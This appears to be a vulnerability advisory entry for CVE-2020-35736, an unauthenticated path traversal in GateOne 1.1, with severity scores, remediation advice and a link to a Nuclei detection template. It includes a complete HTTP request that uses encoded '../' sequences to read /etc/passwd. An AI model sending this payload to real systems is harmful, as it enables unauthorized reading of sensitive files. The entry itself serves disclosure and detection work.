| Title | GateOne 1.1 - Local File Inclusion |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. |
| Remediation | Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1. |
| CVSS Score | 7.5 |
| EPSS Score | 0.82358 |
| CVE ID | CVE-2020-35736 |
| CWE ID | CWE-22 |
| Tags | cve cve2020 gateone lfi liftoffsoftware vuln |
GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35736.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-35736.pcap
N/AN/A